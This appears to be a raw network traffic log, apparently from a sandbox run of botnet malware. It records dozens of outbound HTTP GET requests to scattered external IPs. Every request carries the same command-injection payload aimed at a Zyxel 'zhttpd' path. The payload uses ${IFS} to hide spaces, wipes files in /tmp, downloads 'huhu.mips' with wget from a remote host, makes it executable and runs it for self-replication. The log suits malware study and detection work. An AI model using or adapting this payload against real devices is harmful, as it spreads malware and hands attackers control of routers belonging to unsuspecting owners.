                                                Jan 29, 2024 07:08:08.747343063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9394192.168.2.23463945.183.136.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.747379065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9395192.168.2.2348068175.77.58.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.747437000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9396192.168.2.2354828136.168.207.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.747479916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9397192.168.2.235772624.239.155.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.747523069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9398192.168.2.2353896181.8.243.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.747576952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9399192.168.2.234920664.146.24.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.747608900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9400192.168.2.2334412151.167.173.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.747642994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9401192.168.2.2344400109.171.148.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.747694016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9402192.168.2.2337692149.133.50.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.747729063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9403192.168.2.234113243.149.241.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.747783899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9404192.168.2.2345450206.147.253.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.747826099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9405192.168.2.2347984102.154.60.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.747864008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9406192.168.2.2357062220.96.56.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.747895956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9407192.168.2.2336032123.69.236.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.747931004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9408192.168.2.23446081.42.203.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.747961044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9409192.168.2.2345996108.163.250.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.748004913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9410192.168.2.235542083.16.54.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.748019934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9411192.168.2.234729440.0.72.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.748080969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9412192.168.2.2349474155.27.250.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.748136997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9413192.168.2.2342878160.62.16.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.748152018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9414192.168.2.23413541.99.240.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.748209953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9415192.168.2.2348696151.33.148.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.748253107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9416192.168.2.2349762179.91.14.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.748296976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9417192.168.2.2347978120.21.79.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.748332977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9418192.168.2.2333734126.177.233.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.748368025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9419192.168.2.2360440169.218.163.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.748409986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9420192.168.2.2334130156.39.223.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.748449087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9421192.168.2.233669050.210.183.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.748477936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9422192.168.2.2356544178.88.134.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.748542070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9423192.168.2.2344210157.248.144.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.748580933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9424192.168.2.2341674121.95.36.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.748608112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9425192.168.2.2343266123.133.170.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.748668909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9426192.168.2.2336950134.156.192.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.748688936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9427192.168.2.2349516212.77.169.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.748749018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9428192.168.2.2346606118.59.69.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.748771906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9429192.168.2.2339740160.2.232.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.748805046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9430192.168.2.2334758110.60.70.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.748876095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9431192.168.2.2360826138.133.216.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.748908997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9432192.168.2.2345724126.16.210.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.748950005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9433192.168.2.234052478.202.80.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.748985052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9434192.168.2.2340454168.252.73.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.749020100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9435192.168.2.2352452163.30.231.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.749051094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9436192.168.2.2338324223.136.18.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.749090910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9437192.168.2.234574035.199.182.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.749138117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9438192.168.2.2350878171.19.203.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.749169111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9439192.168.2.2342722105.215.205.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.749197006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9440192.168.2.2341606173.252.63.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.749248028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9441192.168.2.235704285.78.252.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.749257088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9442192.168.2.23549282.93.163.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.749311924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9443192.168.2.235140264.109.229.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.749351978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9444192.168.2.235858664.156.145.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.749412060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9445192.168.2.2346538155.26.144.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.749432087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9446192.168.2.2337488172.173.21.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.749473095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9447192.168.2.2336580184.198.141.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.749497890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9448192.168.2.2349416101.173.69.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.749556065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9449192.168.2.234193274.201.187.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.749591112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9450192.168.2.2352766140.189.8.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.749631882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9451192.168.2.235864091.158.183.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.749677896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9452192.168.2.2338746104.164.116.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.749718904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9453192.168.2.23561149.215.99.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.749737978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9454192.168.2.2334382222.236.103.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.749775887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9455192.168.2.2338676106.117.130.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.749808073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9456192.168.2.23458861.224.70.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:08.749874115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9457192.168.2.235746898.0.149.108443
                                                TimestampBytes transferredDirectionData
